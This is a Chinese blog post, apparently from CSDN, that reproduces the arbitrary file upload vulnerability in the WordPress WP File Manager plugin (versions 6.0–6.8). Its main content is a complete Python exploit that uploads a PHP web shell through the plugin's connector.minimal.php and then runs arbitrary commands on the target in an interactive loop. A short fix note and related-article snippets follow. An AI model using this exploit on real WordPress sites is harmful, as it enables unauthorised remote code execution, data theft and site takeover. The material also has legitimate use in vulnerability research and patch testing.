(环境搭建+复现) Wordpress文件管理插件任意文件上传漏洞

最新推荐文章于 2024-04-12 06:05:30 发布
最新推荐文章于 2024-04-12 06:05:30 发布
阅读量1.9k 收藏 2
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40989258/article/details/108777389
版权

0x00 简介

WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。

文件管理器允许您直接从WordPress后端编辑,删除,上载,下载,压缩,复制和粘贴文件和文件夹。不必费心使用FTP来管理文件和从一个位置移动文件。有史以来功能最强大,最灵活,最简单的WordPress文件管理解决方案!

0x01 漏洞概述

安全人员进行调查时,很快发现WordPress插件WP File Manager中存在一个严重的0day安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程执行代码。

攻击者可能会做任何他们选择采取的行动–窃取私人数据,破坏站点或使用该网站对其他站点或基础结构进行进一步的攻击。

0x02 影响版本

WP File Manager  6.0—6.8

0x03 环境搭建

Wordpress 5.4.1

https://cn.wordpress.org/wordpress-5.4.1-zh_CN.tar.gz

wp-file-manager 6.0

https://wwe.lanzous.com/iN0A7hafg4h

0x04 漏洞利用

使用Python脚本,如果用的python2,记得把input改成raw_input

#!/usr/bin/python3
# -*- coding: UTF-8 -*-
"""
@Author  : xDroid
@File    : wp.py
@Time    : 2020/9/21
"""
import requests
requests.packages.urllib3.disable_warnings()
from hashlib import md5
import random
import json
import optparse
import sys

GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
ENDC = '\033[0m'

proxies={ 'http':'127.0.0.1:8080', 'https':'127.0.0.1:8080' }

def randmd5():
    new_md5 = md5()
    new_md5.update(str(random.randint(1, 1000)).encode())
    return new_md5.hexdigest()[:6]+'.php'

def file_manager(url):
    if not url:
        print('#Usage : python3 file_manager_upload.py -u http://127.0.0.1')
        sys.exit()
    vuln_url=url.strip()+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
    filename=randmd5()
    headers={
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0',
        'Content-Type':'multipart/form-data;boundary=---------------------------42474892822150178483835528074'
    }
    data="-----------------------------42474892822150178483835528074\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n1744f7298611ba\r\n-----------------------------42474892822150178483835528074\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------42474892822150178483835528074\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------42474892822150178483835528074\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"%s\"\r\nContent-Type: application/php\r\n\r\n<?php system($_GET['cmd']); ?>\r\n-----------------------------42474892822150178483835528074\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n1597850374\r\n-----------------------------42474892822150178483835528074--\r\n"%filename
    try:
        resp=requests.post(url=vuln_url,headers=headers,data=data,timeout=3, verify=False,proxies=proxies)
        result = json.loads(resp.text)
        if filename == result['added'][0]['url'].split('/')[-1]:
            print(GREEN+'[+]\t\t'+ENDC+YELLOW+'File Uploaded Success\t\t'+ENDC)
            while(True):
                command = input("请输入执行的命令:")
                if "q" == command:
                    sys.exit()
                exec_url = url+'/wp-content/plugins/wp-file-manager/lib/files/'+filename+'?cmd='+command.strip()
                exec_resp = requests.get(url=exec_url)
                exec_resp.encoding='gb2312'
                print(exec_resp.text)

        else:
            print(RED+'[-]\t\tUploaded failed\t\t'+ENDC)
    except Exception as e:
        print(RED + '[-]\t\tUploaded failed\t\t' + ENDC)


if __name__ == '__main__':
    banner = GREEN+'''
      __ _ _                                                    
     / _(_) | ___   _ __ ___   __ _ _ __   __ _  __ _  ___ _ __ 
    | |_| | |/ _ \ | '_ ` _ \ / _` | '_ \ / _` |/ _` |/ _ \ '__|
    |  _| | |  __/ | | | | | | (_| | | | | (_| | (_| |  __/ |   
    |_| |_|_|\___| |_| |_| |_|\__,_|_| |_|\__,_|\__, |\___|_|   
                                                |___/           
                    by: Timeline Sec
                    file manager 6.0-6.8 file upload
    '''+ENDC
    print(banner)
    parser = optparse.OptionParser('python3 %prog' + '-h')
    parser.add_option('-u', dest='url', type='str', help='wordpress url')
    (options, args) = parser.parse_args()
    file_manager(options.url)

0x05 修复方式

WP File Manager升级到6.9版本

参考:

https://github.com/xDro1d/wp-file-manager

daxi0ng
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
漏洞Wordpress AI Engine件-任意文件-Upload
知黑而守白
06-20 44
wordpress是一种自由和开放源代码的内容管理系统,基于php和mysql,使用wordpress,用户可以很容易地创建和维护个人或商业网站、博客、电子商务网站或应用程序,而无需深入了解编程语言或数据库管理Wordpress saveconfiguration接口处存在任意文件漏洞,恶意攻击者可以上恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
允许 WordPress任意文件的方法
09-29
从 WP 2.8.5 开始文件使用预定义的文件扩展名列表过滤,管理员也不例外。
wordpress漏洞_Wordpress File-manager 任意文件漏洞
weixin_39960793的博客
12-12 1916
一、漏洞介绍软件及漏洞简介:wordpress File Manager件 是最强悍和便利的WordPress文件管理件,可以直接在WordPress后台管理你网站的所有文件,可以完全替代FTP,甚至功能要比FTP还要丰富,可以在线上、下载、压缩、解压、查看、编辑文件等。WordPress件WPFileManager中存在一个严重的0day安全漏洞,攻击者可以在安装了此件的任何WordP...
Matlab 使用笔记(本人出品,必属精品)
热门推荐
一些笔记
05-13 3万+
此篇博客记录了一些Matlab 的使用技巧,出于方便自己以后查阅之目的,感兴趣的朋友可以看看,本人会不定期更新的。
漏洞WordPress件wp-file-manager任意文件漏洞(CVE-2020-25213)
做自己喜欢的事,并将其发挥到极致!
09-15 937
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress当作一个内容管理系统(CMS)来使用。文件管理器允许您直接从WordPress后端编辑、删除、上、下载、压缩、制和粘贴文件文件夹。有史以来功能最强大、最灵活、最简单的WordPress文件管理解决方案。WordPress件WPFileManager中存在一个严重的安全漏洞,攻击者可以在安装了此件的任何WordPress网站上任意文件并远程代码执行。
WordPress wp-file-manager 文件漏洞 CVE-2020-25213
Dokii_i的博客
01-25 1228
直接访问 http://127.0.0.1/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php 可以看到响应的 id。直接访问 http://127.0.0.1/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php 可以看到响应的对象。如果 $cmd 为 upload,exec方法 就调用 elFinder类 的 upload方法 了。
.exp文件_wordpress件filemanager任意文件漏洞(附EXP)
weixin_39980711的博客
11-27 530
我认为人不但要有科学、技术,还要有文化、艺术跟音乐。钱老前言wordpress往往在件暴漏出漏洞,这里是举例 file-manager 6.0-6.8 暴露的任意文件漏洞,由于对上文件没有严格的过滤导致出缺陷。环境搭建这里的 phpstudy 使用的组件版本如下:Apache2.4.39MySQL5.7.26PHP7.3.4nts注:PHP的版本尽量不要太低,不然安装 wor...
wordpress漏洞php文件,WordPress wp-admin/includes/file.php任意文件漏洞
weixin_31861847的博客
03-09 545
影响版本:WordPress <= 2.8.5漏洞描述:WordPress是一款免费的论坛Blog系统。WordPress中负责上文件的代码如下:wp-admin/includes/file.php:---[cut]---line 217:function wp_handle_upload( &$file, $overrides = false, $time = null ) {-...
wordpress 评论件 wpDiscuz 任意文件漏洞分析1
08-03
前言1. 环境搭建后,手动安装 wpdiscuz 件后,看到文章下增加评论模块环境分析2.phpstorm 导入 web 目录,点击图片按钮,上一个 php
phpcmsv9.0任意文件漏洞解析
01-19
漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:...
php post 漏洞_漏洞分析:WordPress 5.0 RCE(CVE-2019-6977)
weixin_39541600的博客
11-19 597
漏洞通过路径遍历和本地文件包含漏洞的组合实WorePress核心中的远程代码执行,据漏洞发布者ripstech透露,此漏洞已在WordPress核心中存在6年以上。权限需求author及以上权限,相对来说,权限需求不算高,很多小型协作内容输出小社区诸如乐谱站会较为常用wordpress,而后给予普通作者author权限。影响范围因WordPress 4.9.9和5.0.1其他安全补丁所致,文件...
WordPress ProfilePress件多个严重漏洞
最新发布
m0_61043185的博客
04-12 778
在用户画像更新过程中,拥有账户的攻击者可按照设置为管理员的数组参数提供用户元数据,从而提升权限至管理员。该漏洞存在于Image Uploader组件中,攻击者可上伪装为图像的任意文件,包含PHP文件,从而实远程代码执行及站点完全接管。该漏洞存在于File Uploader组件中,如果管理员没有配置文件设置,攻击者可在用户注册或画像更新过程中上任意文件,从而实远程代码执行及站点接管。严重:9.8厂商已发布升级修漏洞,用户请尽快更新至安全版本。
漏洞分析】WordPress任意文件漏洞
weixin_30456039的博客
08-10 604
影响版本: WordPress <= 2.8.5漏洞描述: BUGTRAQ ID: 37005 WordPress是一款免费的论坛Blog系统。 WordPress中负责上文件的代码如下: wp-admin/includes/file.php: ---[cut]--- line 217: function wp_handle_upload( &$file, $overri...
Wordpress漏洞
weixin_52194536的博客
09-10 8867
cms漏洞
wordpress漏洞php文件夹,WordPress Asset-Manager PHP文件漏洞
weixin_39517054的博客
04-04 225
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager件2.0以及以下版本发的。允许上php文件、一用户可以上一个文件到一个临时目录没有身份验证,从而导致执行任意代码。### This file is part of the Metasploit Framework and may be subject to# redistribution and co...
万户oa officeserver.jsp任意文件漏洞
12-22
这是一个常见的漏洞,攻击者可以利用它上恶意文件到服务器上,从而对系统进行攻击。首先,攻击者需要找到目标系统上的OA officeserver.jsp文件,并确定该文件存在上漏洞。接下来,攻击者可以通过浏览器或其他工具访问officeserver.jsp文件,并上恶意的文件,比如Webshell文件。 在上过程中,攻击者可能需要绕过一些安全控制,可能需要修改请求头或使用特定的文件格式来欺骗服务器。一旦成功上了恶意文件,攻击者就可以利用它来执行任意的命令,比如查看、修改和删除服务器上的文件,甚至获取系统权限。 为了防止这种漏洞的发生,系统管理员可以采取一些措施,比如限制上文件的类型和大小、检查上文件的内容、限制上文件的访问权限等。此外,及时更新系统补丁,加强对系统的监控和日志审计也是非常重要的。对于已知的漏洞,及时修和更新系统也是必不可少的。 总的来说,要防范万户OA officeserver.jsp任意文件漏洞,就需要管理员有意识地加强对系统的安全防护,加强对漏洞的排查和修,以及加强对系统的监控和审计。这样才能更好地保护系统和信息安全。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值